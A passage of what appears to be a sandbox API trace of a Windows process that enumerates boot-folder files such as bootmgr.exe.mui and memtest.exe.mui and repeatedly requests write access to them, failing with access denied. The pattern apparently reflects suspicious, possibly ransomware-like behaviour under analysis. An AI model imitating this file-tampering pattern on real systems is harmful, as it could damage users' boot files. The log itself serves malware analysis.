dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.534] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0083.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46978 [0083.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0083.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0083.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0083.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0083.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0083.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0083.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.535] AreFileApisANSI () returned 1 [0083.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\it-IT\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\it-IT\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0083.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0083.535] AreFileApisANSI () returned 1 [0083.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0083.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 30 [0083.535] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.536] GetFileType (hFile=0x42c) returned 0x1 [0083.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0083.536] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.536] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.536] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.536] CloseHandle (hObject=0x42c) returned 1 [0083.536] AreFileApisANSI () returned 1 [0083.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0083.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 30 [0083.536] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.537] GetLastError () returned 0x5 [0083.537] GetLastError () returned 0x5 [0083.537] SetLastError (dwErrCode=0x5) [0083.537] GetLastError () returned 0x5 [0083.537] SetLastError (dwErrCode=0x5) [0083.537] GetLastError () returned 0x5 [0083.537] SetLastError (dwErrCode=0x5) [0083.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.537] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5d8ab4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf30285aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0083.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0083.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0083.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0083.538] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.538] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.538] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.538] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.538] AreFileApisANSI () returned 1 [0083.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\it-IT\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\it-IT\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.538] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.538] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0083.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0083.538] AreFileApisANSI () returned 1 [0083.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0083.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\it-IT\\memtest.exe.mui") returned 30 [0083.538] CreateFileW (lpFileName="C:\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.539] GetFileType (hFile=0x42c) returned 0x1 [0083.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0083.539] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.539] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.539] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.539] CloseHandle (hObject=0x42c) returned 1 [0083.539] AreFileApisANSI () returned 1 [0083.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53718 [0083.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x53718, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\it-IT\\memtest.exe.mui") returned 30 [0083.540] CreateFileW (lpFileName="C:\\Boot\\it-IT\\memtest.exe.mui" (normalized: "c:\\boot\\it-it\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.540] GetLastError () returned 0x5 [0083.540] GetLastError () returned 0x5 [0083.540] SetLastError (dwErrCode=0x5) [0083.540] GetLastError () returned 0x5 [0083.540] SetLastError (dwErrCode=0x5) [0083.540] GetLastError () returned 0x5 [0083.540] SetLastError (dwErrCode=0x5) [0083.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0083.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0083.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.540] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x690d8, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧놠")) returned 0 [0083.540] FindClose (in: hFindFile=0x78110 | out: hFindFile=0x78110) returned 1 [0083.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46978 | out: hHeap=0x20000) returned 1 [0083.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0083.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.541] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.541] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.541] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.541] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.541] AreFileApisANSI () returned 1 [0083.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\ja-JP", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\ja-JP", lpUsedDefaultChar=0x0) returned 14 [0083.541] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.541] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0083.541] AreFileApisANSI () returned 1 [0083.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x883b0 [0083.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x883b0, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\ja-JP") returned 14 [0083.541] CreateFileW (lpFileName="C:\\Boot\\ja-JP" (normalized: "c:\\boot\\ja-jp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.541] GetLastError () returned 0x5 [0083.541] GetLastError () returned 0x5 [0083.541] SetLastError (dwErrCode=0x5) [0083.541] GetLastError () returned 0x5 [0083.541] SetLastError (dwErrCode=0x5) [0083.542] GetLastError () returned 0x5 [0083.542] SetLastError (dwErrCode=0x5) [0083.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.542] AreFileApisANSI () returned 1 [0083.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0083.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\ja-JP") returned 14 [0083.542] CreateFileW (lpFileName="C:\\Boot\\ja-JP" (normalized: "c:\\boot\\ja-jp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.542] GetLastError () returned 0x5 [0083.542] GetLastError () returned 0x5 [0083.542] SetLastError (dwErrCode=0x5) [0083.542] GetLastError () returned 0x5 [0083.542] SetLastError (dwErrCode=0x5) [0083.542] GetLastError () returned 0x5 [0083.542] SetLastError (dwErrCode=0x5) [0083.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.542] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.542] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.542] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.542] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.542] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0083.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.542] RtlAllocateHeap (HeapHandle=0x20000, 